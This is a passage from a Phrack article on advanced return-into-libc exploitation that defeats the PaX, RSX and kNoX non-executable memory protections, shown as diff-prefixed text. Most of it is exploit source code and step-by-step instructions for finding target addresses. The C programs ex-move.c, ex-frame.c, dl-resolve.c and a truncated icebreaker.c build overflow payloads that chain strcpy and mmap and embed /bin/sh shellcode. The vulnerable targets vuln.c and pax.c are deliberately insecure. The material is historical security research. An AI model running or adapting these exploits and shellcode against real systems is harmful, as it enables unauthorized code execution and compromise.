+we can not only modify %eip, but also place function arguments (after the
+return address) at the stack top.
+
+  Let's consider two other large classes of vulnerabilities: malloc
+control structures corruption and format string attacks. In case of the
+previous, we may at most count on overwriting an arbitrary int with an
+arbitrary value - it is too little to bypass PaX protection genericly. In
+case of the latter, we may usually alter arbitrary number of bytes. If we
+could overwrite saved %ebp and %eip of any function, we wouldn't need
+anything more; but because the stack base is randomized, there is no way
+to determine the address of any frame. 
+
+***
+(Digression: saved FP is a pointer which can be used as an argument
+to %hn. But the succesfull exploitation would require three function returns
+and preferably an appropriately located user-controlled 64KB buffer.) 
+***
+
+I hope that it is obvious that changing some GOT entry (that is, gaining 
+control over %eip only) is not enough to evade PaX.
+
+  However, there is an exploitable scenario that is likely to happen.
+Let's assume three conditions:
+
+1) The attacked binary has been compiled with -fomit-frame-pointer 
+2) There is a function f1, which allocates a stack buffer whose content we 
+   control
+3) There is a format bug (or a misused free()) in the function f2, which is
+   called (possibly indirectly) by f1.
+
+The sample vulnerable code follows:
+
+        void f2(char * buf)
+        {
+                printf(buf); // format bug here
+                some_libc_function();
+        }
+        void f1(char * user_controlled)
+        {
+                char buf[1024];
+                buf[0] = 0;
+                strncat(buf, user_controlled, sizeof(buf)-1);
+                f2(buf);
+        }
+
+  Suppose f1() is being called. With the help of a malicious format 
+string we can alter some_libc_function's GOT entry so that it contains the 
+address of the following piece of code:
+
+        addl $imm, %esp
+        ret
+
+that is, some epilogue of a function. In such case, when some_libc_function
+is called, the "addl $imm, %esp" instruction will alter %esp. If we choose
+an epilogue with a proper $imm, %esp will point within "buf" variable,
+whose content is user controlled. From this moment on, the situation looks
+just like in case of a stack buffer overflow. We can chain functions, use
+ret-into-dl etc. 
+
+  Another case: a stack buffer overflow by a single byte. Such
+overflow nullifies the least significant byte of a saved frame pointer.
+After the second function return, an attacker has a fair chance to gain
+full control over the stack, which enables him to use all the presented
+techniques.         
+
+         
+----[ 7.3 - Other non-exec solutions
+
+  I am aware of two other solutions, which make all data areas
+non-executable on Linux i386. The first one is RSX [10]. However, this
+solution does not implement stack nor libraries base randomization, so 
+techniques described in chapter 3 are sufficient to chain multiple function 
+calls.
+
+  Some additional effort must be invested if we want to execute
+arbitrary code. On RSX, one is not allowed to execute code placed in a
+writable memory area, so the mmap(...PROT_READ|PROT_WRITE|PROT_EXEC) trick
+does not work. But any non-exec scheme must allow to execute code from
+shared libraries. In RSX case, it is enough to mmap(...PROT_READ|PROT_EXEC)
+a file containing a shellcode. In case of a remote exploit, the function
+chaining allows us to even create such a file first.
+
+  The second solution, kNoX [11], is very similar to RSX. Additionally, 
+it mmaps all libraries at addresses starting at 0x00110000 (just like in
+the case of Solar's patch). As mentioned at the end of 3.4, this protection
+is insufficient as well.
+
+
+----[ 7.4 - Improving existing non-exec schemes
+
+  (Un)fortunately, I don't see a way to fix PaX so that it would be 
+immune to the presented techniques. Clearly, ELF standard specifies too
+many features useful for attackers. Certainly, some of presented tricks can
+be stopped from working. For example, it is possible to patch the kernel so
+that it would not honor MAP_FIXED flag when PROT_EXEC is present. Observe
+this would not prevent shared libraries from working, while stopping the
+presented exploits. Yet, this fixes only one possible usage of function
+chaining.
+
+  On the other hand, deploying PaX (especially when backed by
+segvguard) can make the successful exploitation much more difficult, in
+some cases even impossible. When (if) PaX becomes more stable, it will be
+wise to use it, simply as another layer of defense.
+
+
+----[ 7.5 - The versions used
+
+  I have tested the sample code with the following versions of patches:
+
+pax-linux-2.4.16.patch
+kNoX-2.2.20-pre6.tar.gz
+rsx.tar.gz for kernel 2.4.5
+
+  You may test the code on any vanilla 2.4.x kernel as well. Due to some
+optimisations, the code will not run on 2.2.x.
+
+
+ 
+--[ 8 - Referenced publications and projects
+
+[1] Aleph One
+        the article in phrack 49 that everybody quotes
+[2] Solar Designer
+        "Getting around non-executable stack (and fix)"
+        http://www.securityfocus.com/archive/1/7480
+[3] Rafal Wojtczuk
+        "Defeating Solar Designer non-executable stack patch"
+        http://www.securityfocus.com/archive/1/8470
+[4] John McDonald
+        "Defeating Solaris/SPARC Non-Executable Stack Protection"
+        http://www.securityfocus.com/archive/1/12734
+[5] Tim Newsham
+        "non-exec stack"
+        http://www.securityfocus.com/archive/1/58864
+[6] Gerardo Richarte, "Re: Future of buffer overflows ?"
+        http://www.securityfocus.com/archive/1/142683
+[7] PaX team
+        PaX
+        http://pageexec.virtualave.net
+[8] segvguard
+        ftp://ftp.pl.openwall.com/misc/segvguard/
+[9] ELF specification
+        http://fileformat.virtualave.net/programm/elf11g.zip
+[10] Paul Starzetz
+        Runtime addressSpace Extender
+        http://www.ihaquer.com/software/rsx/
+[11] Wojciech Purczynski
+        kNoX
+        http://cliph.linux.pl/knox
+[12] grugq
+        "Cheating the ELF"
+        http://hcunix.7350.org/grugq/doc/subversiveld.pdf
+
+
+<++> phrack-nergal/README.code !35fb8b53
+
+                    The advanced return-into-lib(c) exploits:
+                                PaX case study
+                       Comments on the sample exploit code
+
+                                   by Nergal
+
+
+ 
+        First, you have to prepare the sample vulnerable programs:
+$ gcc -o vuln.omit -fomit-frame-pointer vuln.c
+$ gcc -o vuln vuln.c
+$ gcc -o pax pax.c
+You may strip the binaries if you wish.
+
+
+
+I. ex-move.c
+~~~~~~~~~~~~
+
+        At the top of ex-move.c, there are definitions for LIBC, STRCPY, 
+MMAP, POPSTACK, POPNUM, PLAIN_RET, FRAMES constants. You have to correct them.
+MMAP_START can be left untouched.
+
+1) LIBC
+[nergal@behemoth pax]$ ldd ./vuln.omit
+        libc.so.6 => /lib/libc.so.6 (0x4001e000) <- this is our address
+        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
+
+2) STRCPY
+[nergal@behemoth pax]$ objdump -T vuln.omit
+
+vuln.omit:     file format elf32-i386
+
+DYNAMIC SYMBOL TABLE:
+08048348  w   DF *UND*  00000081  GLIBC_2.0   __register_frame_info
+08048358      DF *UND*  0000010c  GLIBC_2.0   getenv
+08048368  w   DF *UND*  000000ac  GLIBC_2.0   __deregister_frame_info
+08048378      DF *UND*  000000e0  GLIBC_2.0   __libc_start_main
+08048388  w   DF *UND*  00000091  GLIBC_2.1.3 __cxa_finalize
+08048530 g    DO .rodata        00000004  Base        _IO_stdin_used
+00000000  w   D  *UND*  00000000              __gmon_start__
+08048398      DF *UND*  00000030  GLIBC_2.0   strcpy
+   ^
+   |---- this is the address we seek
+
+3) MMAP
+[nergal@behemoth pax]$ objdump -T /lib/libc.so.6 | grep mmap
+000daf10  w   DF .text  0000003a  GLIBC_2.0   mmap
+000db050  w   DF .text  000000a0  GLIBC_2.1   mmap64
+        The address we need is 000daf10, then.
+
+4) POPSTACK
+        We have to find "add $imm,%esp" followed by "ret". We must 
+disassemble vuln.omit with the command "objdump --disassemble ./vuln.omit". 
+To simplify, we can use
+[nergal@behemoth pax]$ objdump --disassemble ./vuln.omit |grep -B 1 ret
+...some crap
+--
+ 80484be:       83 c4 2c                add    $0x2c,%esp
+ 80484c1:       c3                      ret
+--
+ 80484fe:       5d                      pop    %ebp
+ 80484ff:       c3                      ret
+--
+...more crap
+We have found the esp moving instructions at 0x80484be.
+
+5) POPNUM
+        This is the amount of bytes which are added to %esp in POPSTACK. 
+In the previous example, it was 0x2c.
+
+6) PLAIN_RET
+        The address of a "ret" instruction. As we can see in the disassembler
+output, there is one at 0x80484c1.
+
+7) FRAMES
+        Now, the tough part. We have to find the %esp value just after the 
+overflow (our overflow payload will be there). So, we will make vuln.omit 
+dump core (alternatively, we could trace it with a debugger). Having adjusted 
+all previous #defines, we run ex-move with a "testing" argument, which will 
+put 0x5060708 into saved %eip.
+[nergal@behemoth pax]$ ./ex-move testing
+Segmentation fault (core dumped)          <- all OK
+[nergal@behemoth pax]$ gdb ./vuln.omit core
+(no debugging symbols found)...
+Core was generated by ./vuln.omit'.
+Program terminated with signal 11, Segmentation fault.
+#0  0x5060708 in ?? ()
+        If in the %eip there is other value than 0x5060708, this means that 
+we have to align our overflow payload. If necessary, "scratch" array in 
+"struct ov" should be re-sized.  
+(gdb) info regi
+...
+esp            0xbffffde0       0xbffffde0
+...
+The last value we need is 0xbffffde0. 
+
+
+
+II. ex-frame.c
+~~~~~~~~~~~~~~   
+
+        Again LIBC, STRCPY, MMAP, LEAVERET and FRAMES must be adjusted. LIBC,
+STRCPY, MMAP and FRAMES should be determined in exactly the same way like in
+case of ex-move.c.  LEAVERET should be the address of a "leave; ret"
+sequence; we can find it with
+[nergal@behemoth pax]$ objdump --disassemble vuln|grep leave -A 1
+objdump: vuln: no symbols
+ 8048335:       c9                      leave
+ 8048336:       c3                      ret
+--
+ 80484bd:       c9                      leave
+ 80484be:       c3                      ret
+--
+ 8048518:       c9                      leave
+ 8048519:       c3                      ret
+
+        So, we may use 0x80484bd for our purposes.
+
+
+
+III. dl-resolve.c
+~~~~~~~~~~~~~~~~~
+
+        We have to adjust STRTAB, SYMTAB, JMPREL, VERSYM and PLT_SECTION 
+defines. As they refer to dl-resolve binary itself, we have to compile it 
+twice with the same compiler options. For the first compilation, we can 
+#define dummy values. Then, we run 
+[nergal@behemoth pax]$ objdump -x dl-resolve 
+        In the output, we see:
+[...crap...]
+Dynamic Section:
+  NEEDED      libc.so.6
+  INIT        0x804839c
+  FINI        0x80486ec
+  HASH        0x8048128
+  STRTAB      0x8048240   (!!!)
+  SYMTAB      0x8048170   (!!!)
+  STRSZ       0xa1
+  SYMENT      0x10
+  DEBUG       0x0
+  PLTGOT      0x80497a8
+  PLTRELSZ    0x48
+  PLTREL      0x11
+  JMPREL      0x8048354   (!!!)
+  REL         0x8048344
+  RELSZ       0x10
+  RELENT      0x8
+  VERNEED     0x8048314
+  VERNEEDNUM  0x1
+  VERSYM      0x80482f8   (!!!)
+
+        The PLT_SECTION can also be retrieved from "objdump -x" output
+[...crap...] 
+Sections:
+Idx Name          Size      VMA       LMA       File off  Algn
+  0 .interp       00000013  080480f4  080480f4  000000f4  2**0
+...
+ 11 .plt          000000a0  080483cc  080483cc  000003cc  2**2
+                  CONTENTS, ALLOC, LOAD, READONLY, CODE
+        So, we should use 0x080483cc for our purposes. Having adjusted the 
+defines, you should compile dl-resolve.c again. Then run it under strace. At 
+the end, there should be something like:
+old_mmap(0xaa011000, 16846848, PROT_READ|PROT_WRITE|PROT_EXEC,
+MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0x1011000) = 0xaa011000
+_exit(123)                              = ?
+
+        As we see, mmap() is called, though it was not present in 
+dl-resolve.c's PLT. Of course, I could have added the shellcode execution, 
+but this would unnecessarily complicate this proof-of-concept code.
+
+
+
+
+IV. icebreaker.c
+~~~~~~~~~~~~~~~~
+
+Nine #defines have to be adjusted. Most of them have already been explained.
+Two remain: FRAMESINDATA and VIND.
+
+1) FRAMESINDATA
+This is the location of a static (or malloced) variable where the fake
+frames are copied to. In case of pax.c, we need to find the address of
+"bigbuf" array. If the attacked binary was not stripped, it would be easy.
+Otherwise, we have to analyse the disassembler output. The "bigbuf" variable
+is present in the arguments to "strncat" function in pax.x, line 13:
+                strncat(bigbuf, ptr, sizeof(bigbuf)-1);
+So we may do:
+[nergal@behemoth pax]$ objdump -T pax | grep strncat
+0804836c      DF *UND*  0000009e  GLIBC_2.0   strncat
+[nergal@behemoth pax]$ objdump -d pax|grep 804836c -B 3  <- _not_ 0804836c
+objdump: pax: no symbols
+ 8048362:       ff 25 c8 95 04 08       jmp    *0x80495c8
+ 8048368:       00 00                   add    %al,(%eax)
+ 804836a:       00 00                   add    %al,(%eax)
+ 804836c:       ff 25 cc 95 04 08       jmp    *0x80495cc
+--
+ 80484e5:       68 ff 03 00 00          push   $0x3ff           <- 1023
+ 80484ea:       ff 75 e4                pushl  0xffffffe4(%ebp) <- ptr
+ 80484ed:       68 c0 9a 04 08          push   $0x8049ac0       <- bigbuf
+ 80484f2:       e8 75 fe ff ff          call   0x804836c
+
+So, the address of bigbuf is 0x8049ac0.
+
+2) VIND
+As mentioned in the phrack article, we have to determine [lowaddr, hiaddr]
+bounds, then search for a null short int in the interval
+[VERSYM+(low_addr-SYMTAB)/8, VERSYM+(hi_addr-SYMTAB)/8].
+
+[nergal@behemoth pax]$ gdb ./icebreaker
+(gdb) set args testing
+(gdb) r
+Starting program: /home/nergal/pax/./icebreaker testing
+Program received signal SIGTRAP, Trace/breakpoint trap.
+Cannot remove breakpoints because program is no longer writable.
+It might be running in another process.
+Further execution is probably impossible.
+0x4ffb7d30 in ?? ()      <- icebreaker executed pax
+(gdb) c
+Continuing.
+
+Program received signal SIGSEGV, Segmentation fault.
+Cannot remove breakpoints because program is no longer writable.
+It might be running in another process.
+Further execution is probably impossible.
+0x5060708 in ?? ()      <- pax has segfaulted
+(gdb) shell
+[nergal@behemoth pax]$ ps ax | grep pax
+ 1419 pts/0    T      0:00 pax
+[nergal@behemoth pax]$ cat /proc/1419/maps
+08048000-08049000 r-xp 00000000 03:45 100958     /home/nergal/pax/pax
+08049000-0804a000 rw-p 00000000 03:45 100958     /home/nergal/pax/pax
+^^^^^^^^^^^^^^^^^
+^^^^^^^^^^^^^^^^^ here are our lowaddr, hiaddr
+4ffb6000-4ffcc000 r-xp 00000000 03:45 107760     /lib/ld-2.1.92.so
+4ffcc000-4ffcd000 rw-p 00015000 03:45 107760     /lib/ld-2.1.92.so
+4ffcd000-4ffce000 rw-p 00000000 00:00 0
+4ffd4000-500ef000 r-xp 00000000 03:45 107767     /lib/libc-2.1.92.so
+500ef000-500f5000 rw-p 0011a000 03:45 107767     /lib/libc-2.1.92.so
+500f5000-500f9000 rw-p 00000000 00:00 0
+bfff6000-bfff8000 rw-p fffff000 00:00 0
+[nergal@behemoth pax]$ exit
+exit
+(gdb) printf "0x%x\n", 0x80482a8+(0x08049000-0x8048164)/8
+0x804847b
+(gdb) printf "0x%x\n", 0x80482a8+(0x0804a000-0x8048164)/8
+0x804867b
+/* so, we search for a null short in [0x804847b, 0x804867b]
+(gdb) printf "0x%x\n", 0x804867b-0x804847b
+0x200
+(gdb) x/256hx 0x804847b
+... a lot of beautiful 0000 in there...
+
+Now read the section 6.2 in the phrack article, or just try a few of the 
+addresses found. 
+<-->
+
+<++> phrack-nergal/vuln.c !a951b08a
+#include <stdlib.h>
+#include <string.h>
+int
+main(int argc, char ** argv)
+{
+	char buf[16];
+	char * ptr = getenv("LNG");
+	if (ptr)
+		strcpy(buf,ptr);
+}
+<-->
+
+<++> phrack-nergal/ex-move.c !81bb65d0
+/* by Nergal */
+
+#include <stdio.h>
+#include <stddef.h>
+#include <sys/mman.h>
+
+#define LIBC             0x4001e000
+#define STRCPY           0x08048398
+#define MMAP             (0x000daf10+LIBC)
+#define POPSTACK         0x80484be
+#define PLAIN_RET        0x80484c1
+#define POPNUM           0x2c
+#define FRAMES           0xbffffde0
+
+#define MMAP_START       0xaa011000
+
+char hellcode[] =
+    "\x90"
+    "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80"
+    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+
+/* This is a stack frame of a function which takes two arguments */
+struct two_arg {
+        unsigned int func;
+        unsigned int leave_ret;
+        unsigned int param1;
+        unsigned int param2;
+};
+struct mmap_args {
+        unsigned int func;
+        unsigned int leave_ret;
+        unsigned int start;
+        unsigned int length;
+        unsigned int prot;
+        unsigned int flags;
+        unsigned int fd;
+        unsigned int offset;
+};
+
+/* The beginning of our overflow payload. 
+Consumes the buffer space and overwrites %eip */
+struct ov {
+        char scratch[28];
+        unsigned int eip;
+};
+
+/* The second part ot the payload. Four functions will be called:
+strcpy, strcpy, mmap, strcpy */
+struct ourbuf {
+        struct two_arg zero1;
+        char pad1[8 + POPNUM - sizeof(struct two_arg)];
+        struct two_arg zero2;
+        char pad2[8 + POPNUM - sizeof(struct two_arg)];
+        struct mmap_args mymmap;
+        char pad3[8 + POPNUM - sizeof(struct mmap_args)];
+        struct two_arg trans;
+        char hell[sizeof(hellcode)];
+};
+
+#define PTR_TO_NULL (FRAMES+sizeof(struct ourbuf))
+//#define PTR_TO_NULL 0x80484a7
+
+main(int argc, char **argv)
+{
+        char lg[sizeof(struct ov) + sizeof(struct ourbuf) + 4 + 1];
+        char *env[2] = { lg, 0 };
+        struct ourbuf thebuf;
+        struct ov theov;
+        int i;
+
+        memset(theov.scratch, 'X', sizeof(theov.scratch));
+
+        if (argc == 2 && !strcmp("testing", argv[1])) {
+                for (i = 0; i < sizeof(theov.scratch); i++)
+                        theov.scratch[i] = i + 0x10;
+                theov.eip = 0x05060708;
+        } else {
+/* To make the code easier to read, we initially return into "ret". This will
+return into the address at the beginning of our "zero1" struct. */
+                theov.eip = PLAIN_RET;
+        }
+
+        memset(&thebuf, 'Y', sizeof(thebuf));
+
+        thebuf.zero1.func = STRCPY;
+        thebuf.zero1.leave_ret = POPSTACK;
+/* The following assignment puts into "param1" the address of the least 
+significant byte of the "offset" field of "mmap_args" structure. This byte 
+will be nullified by the strcpy call. */ 
+        thebuf.zero1.param1 = FRAMES + offsetof(struct ourbuf, mymmap) +
+            offsetof(struct mmap_args, offset);
+        thebuf.zero1.param2 = PTR_TO_NULL;
+
+        thebuf.zero2.func = STRCPY;
+        thebuf.zero2.leave_ret = POPSTACK;
+/* Also the "start" field must be the multiple of page. We have to nullify 
+its least significant byte with a strcpy call. */ 
+        thebuf.zero2.param1 = FRAMES + offsetof(struct ourbuf, mymmap) +
+            offsetof(struct mmap_args, start);
+        thebuf.zero2.param2 = PTR_TO_NULL;
+
+
+        thebuf.mymmap.func = MMAP;
+        thebuf.mymmap.leave_ret = POPSTACK;
+        thebuf.mymmap.start = MMAP_START + 1;
+        thebuf.mymmap.length = 0x01020304;
+/* Luckily, 2.4.x kernels care only for the lowest byte of "prot", so we may
+put non-zero junk in the other bytes. 2.2.x kernels are more picky; in such 
+case, we would need more zeroing. */
+        thebuf.mymmap.prot =
+            0x01010100 | PROT_EXEC | PROT_READ | PROT_WRITE;
+/* Same as above. Be careful not to include MAP_GROWS_DOWN */
+        thebuf.mymmap.flags =
+            0x01010200 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS;
+        thebuf.mymmap.fd = 0xffffffff;
+        thebuf.mymmap.offset = 0x01021001;
+
+/* The final "strcpy" call will copy the shellcode into the freshly mmapped 
+area at MMAP_START. Then, it will return not anymore into POPSTACK, but at 
+MMAP_START+1.
+*/
+        thebuf.trans.func = STRCPY;
+        thebuf.trans.leave_ret = MMAP_START + 1;
+        thebuf.trans.param1 = MMAP_START + 1;
+        thebuf.trans.param2 = FRAMES + offsetof(struct ourbuf, hell);
+
+        memset(thebuf.hell, 'x', sizeof(thebuf.hell));
+        strncpy(thebuf.hell, hellcode, strlen(hellcode));
+
+        strcpy(lg, "LNG=");
+        memcpy(lg + 4, &theov, sizeof(theov));
+        memcpy(lg + 4 + sizeof(theov), &thebuf, sizeof(thebuf));
+        lg[4 + sizeof(thebuf) + sizeof(theov)] = 0;
+
+        if (sizeof(struct ov) + sizeof(struct ourbuf) + 4 != strlen(lg)) {
+                fprintf(stderr,
+                    "size=%i len=%i; zero(s) in the payload, correct it.\n",
+                    sizeof(struct ov) + sizeof(struct ourbuf) + 4,
+                    strlen(lg));
+                exit(1);
+        }
+        execle("./vuln.omit", "./vuln.omit", 0, env, 0);
+}
+<-->
+
+<++> phrack-nergal/pax.c !af6a33c4
+#include <stdlib.h>
+#include <string.h>
+char spare[1024];
+char bigbuf[1024];
+
+int
+main(int argc, char ** argv)
+{
+	char buf[16];
+	char * ptr=getenv("STR");
+	if (ptr) {
+		bigbuf[0]=0;
+		strncat(bigbuf, ptr, sizeof(bigbuf)-1);
+	}
+	ptr=getenv("LNG");
+	if (ptr)
+		 strcpy(buf, ptr);	
+}
+<-->
+
+<++> phrack-nergal/ex-frame.c !a3f70c5e
+/* by Nergal */
+#include <stdio.h>
+#include <stddef.h>
+#include <sys/mman.h>
+
+#define LIBC        0x4001e000
+#define STRCPY      0x08048398
+#define MMAP        (0x000daf10+LIBC)
+#define LEAVERET    0x80484bd
+#define FRAMES      0xbffffe30
+
+#define MMAP_START  0xaa011000
+
+char hellcode[] =
+    "\x90"
+    "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80"
+    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+
+/* See the comments in ex-move.c */
+struct two_arg {
+        unsigned int new_ebp;
+        unsigned int func;
+        unsigned int leave_ret;
+        unsigned int param1;
+        unsigned int param2;
+};
+struct mmap_args {
+        unsigned int new_ebp;
+        unsigned int func;
+        unsigned int leave_ret;
+        unsigned int start;
+        unsigned int length;
+        unsigned int prot;
+        unsigned int flags;
+        unsigned int fd;
+        unsigned int offset;
+};
+
+struct ov {
+        char scratch[24];
+        unsigned int ebp;
+        unsigned int eip;
+};
+
+struct ourbuf {
+        struct two_arg zero1;
+        struct two_arg zero2;
+        struct mmap_args mymmap;
+        struct two_arg trans;
+        char hell[sizeof(hellcode)];
+};
+
+#define PTR_TO_NULL (FRAMES+sizeof(struct ourbuf))
+
+main(int argc, char **argv)
+{
+        char lg[sizeof(struct ov) + sizeof(struct ourbuf) + 4 + 1];
+        char *env[2] = { lg, 0 };
+        struct ourbuf thebuf;
+        struct ov theov;
+        int i;
+
+        memset(theov.scratch, 'X', sizeof(theov.scratch));
+
+        if (argc == 2 && !strcmp("testing", argv[1])) {
+                for (i = 0; i < sizeof(theov.scratch); i++)
+                        theov.scratch[i] = i + 0x10;
+                theov.ebp = 0x01020304;
+                theov.eip = 0x05060708;
+        } else {
+                theov.ebp = FRAMES;
+                theov.eip = LEAVERET;
+        }
+        thebuf.zero1.new_ebp = FRAMES + offsetof(struct ourbuf, zero2);
+        thebuf.zero1.func = STRCPY;
+        thebuf.zero1.leave_ret = LEAVERET;
+        thebuf.zero1.param1 = FRAMES + offsetof(struct ourbuf, mymmap) +
+            offsetof(struct mmap_args, offset);
+        thebuf.zero1.param2 = PTR_TO_NULL;
+
+        thebuf.zero2.new_ebp = FRAMES + offsetof(struct ourbuf, mymmap);
+        thebuf.zero2.func = STRCPY;
+        thebuf.zero2.leave_ret = LEAVERET;
+        thebuf.zero2.param1 = FRAMES + offsetof(struct ourbuf, mymmap) +
+            offsetof(struct mmap_args, start);
+        thebuf.zero2.param2 = PTR_TO_NULL;
+
+
+        thebuf.mymmap.new_ebp = FRAMES + offsetof(struct ourbuf, trans);
+        thebuf.mymmap.func = MMAP;
+        thebuf.mymmap.leave_ret = LEAVERET;
+        thebuf.mymmap.start = MMAP_START + 1;
+        thebuf.mymmap.length = 0x01020304;
+        thebuf.mymmap.prot =
+            0x01010100 | PROT_EXEC | PROT_READ | PROT_WRITE;
+        /* again, careful not to include MAP_GROWS_DOWN below */
+        thebuf.mymmap.flags =
+            0x01010200 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS;
+        thebuf.mymmap.fd = 0xffffffff;
+        thebuf.mymmap.offset = 0x01021001;
+
+        thebuf.trans.new_ebp = 0x01020304;
+        thebuf.trans.func = STRCPY;
+        thebuf.trans.leave_ret = MMAP_START + 1;
+        thebuf.trans.param1 = MMAP_START + 1;
+        thebuf.trans.param2 = FRAMES + offsetof(struct ourbuf, hell);
+
+        memset(thebuf.hell, 'x', sizeof(thebuf.hell));
+        strncpy(thebuf.hell, hellcode, strlen(hellcode));
+
+        strcpy(lg, "LNG=");
+        memcpy(lg + 4, &theov, sizeof(theov));
+        memcpy(lg + 4 + sizeof(theov), &thebuf, sizeof(thebuf));
+        lg[4 + sizeof(thebuf) + sizeof(theov)] = 0;
+
+        if (sizeof(struct ov) + sizeof(struct ourbuf) + 4 != strlen(lg)) {
+                fprintf(stderr,
+                    "size=%i len=%i; zero(s) in the payload, correct it.\n",
+                    sizeof(struct ov) + sizeof(struct ourbuf) + 4,
+                    strlen(lg));
+                exit(1);
+        }
+        execle("./vuln", "./vuln", 0, env, 0);
+}
+<-->
+
+<++> phrack-nergal/dl-resolve.c !d5fc32b7
+/* by Nergal */
+#include <stdlib.h>
+#include <elf.h>
+#include <stdio.h>
+#include <string.h> 
+
+#define STRTAB 0x8048240
+#define SYMTAB 0x8048170
+#define JMPREL 0x8048354
+#define VERSYM 0x80482f8
+
+#define PLT_SECTION "0x080483cc"
+
+void graceful_exit()
+{
+        exit(123);
+}
+
+void doit(int offset)
+{
+        int res;
+        __asm__ volatile ("
+            pushl $0x01011000
+            pushl $0xffffffff
+            pushl $0x00000032
+            pushl $0x00000007
+            pushl $0x01011000
+            pushl $0xaa011000
+            pushl %%ebx
+            pushl %%eax 
+            pushl $" PLT_SECTION " 
+            ret"
+            :"=a"(res)
+            :"0"(offset),
+            "b"(graceful_exit)
+        );
+
+}
+
+/* this must be global */
+Elf32_Rel reloc; 
+
+#define ANYTHING 0xfe
+#define RQSIZE 60000
+int
+main(int argc, char **argv)
+{
+        unsigned int reloc_offset;
+        unsigned int real_index;
+        char symbol_name[16];
+        int dummy_writable_int;
+        char *tmp = malloc(RQSIZE);
+        Elf32_Sym *sym;
+        unsigned short *null_short = (unsigned short*) tmp;
+        
+        /* create a null index into VERSYM */
+        *null_short = 0;
+        
+        real_index = ((unsigned int) null_short - VERSYM) / sizeof(*null_short);
+        sym = (Elf32_Sym *)(real_index * sizeof(*sym) + SYMTAB);
+        if ((unsigned int) sym > (unsigned int) tmp + RQSIZE) {
+                fprintf(stderr,
+                    "mmap symbol entry is too far, increase RQSIZE\n");
+                exit(1);
+        }
+
+        strcpy(symbol_name, "mmap");
+        sym->st_name = (unsigned int) symbol_name - (unsigned int) STRTAB;
+        sym->st_value = (unsigned int) &dummy_writable_int;
+        sym->st_size = ANYTHING;
+        sym->st_info = ANYTHING;
+        sym->st_other = ANYTHING & ~3;
+        sym->st_shndx = ANYTHING;
+        reloc_offset = (unsigned int) (&reloc) - JMPREL;
+        reloc.r_info = R_386_JMP_SLOT + real_index*256;
+        reloc.r_offset = (unsigned int) &dummy_writable_int;
+
+        doit(reloc_offset);
+        printf("not reached\n");
+        return 0;
+}
+<-->
+
+<++> phrack-nergal/icebreaker.c !19d7ec6d
+/* by Nergal */
+#include <stdio.h>
+#include <stddef.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdlib.h>
+
+#define STRCPY          0x080483cc
+#define LEAVERET        0x08048359
+#define FRAMESINDATA    0x08049ac0
+
+#define STRTAB          0x8048204
+#define SYMTAB          0x8048164
+#define JMPREL          0x80482f4
+#define VERSYM          0x80482a8
+#define PLT             0x0804835c
+
+#define VIND            0x804859b
+
+#define MMAP_START      0xaa011000
+
+char hellcode[] =
+    "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80"
+    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+/*
+Unfortunately, if mmap_string = "mmap", accidentaly there appears a "0" in 
+our payload. So, we shift the name by 1 (one 'x').
+*/
+#define NAME_ADD_OFF 1
+
+char mmap_string[] = "xmmap";
+
+
+
+
+struct two_arg {
+        unsigned int new_ebp;
+        unsigned int func;
+        unsigned int leave_ret;
+        unsigned int param1;
+        unsigned int param2;
+};
+struct mmap_plt_args {
+        unsigned int new_ebp;
+        unsigned int put_plt_here;
+        unsigned int reloc_offset;
+        unsigned int leave_ret;
+        unsigned int start;
+        unsigned int length;
+        unsigned int prot;
+        unsigned int flags;
+        unsigned int fd;
+        unsigned int offset;
+};
+struct my_elf_rel {
+        unsigned int r_offset;
+        unsigned int r_info;
+};
+struct my_elf_sym {
+        unsigned int st_name;
+        unsigned int st_value;
+        unsigned int st_size;        /* Symbol size */
+        unsigned char st_info;        /* Symbol type and binding */
+        unsigned char st_other;        /* ELF spec say: No defined meaning, 0 */
+        unsigned short st_shndx;        /* Section index */
+
+};
+
+
+struct ourbuf {
+        struct two_arg reloc;
+        struct two_arg zero[8];
+        struct mmap_plt_args mymmap;
+        struct two_arg trans;
+        char hell[sizeof(hellcode)];
+        struct my_elf_rel r;
+        struct my_elf_sym sym;
+        char mmapname[sizeof(mmap_string)];
+
+};
+
+struct ov {
+        char scratch[24];
+        unsigned int ebp;
+        unsigned int eip;
+};
+
+#define PTR_TO_NULL (VIND+1)
+/* this functions prepares strcpy frame so that the strcpy call will zero
+   a byte at "addr" 
+*/
+void fix_zero(struct ourbuf *b, unsigned int addr, int idx)
+{
+        b->zero[idx].new_ebp = FRAMESINDATA +
+            offsetof(struct ourbuf,
+            zero) + sizeof(struct two_arg) * (idx + 1);
+        b->zero[idx].func = STRCPY;
+        b->zero[idx].leave_ret = LEAVERET;
+        b->zero[idx].param1 = addr;
+        b->zero[idx].param2 = PTR_TO_NULL;
+}
+
+/* this function checks if the byte at position "offset" is zero; if so,
+prepare a strcpy frame to nullify it; else, prepare a strcpy frame to 
+nullify some secure, unused location */ 
+void setup_zero(struct ourbuf *b, unsigned int offset, int zeronum)
+{
+        char *ptr = (char *) b;
+        if (!ptr[offset]) {
+                fprintf(stderr, "fixing zero at %i(off=%i)\n", zeronum,
+                    offset);
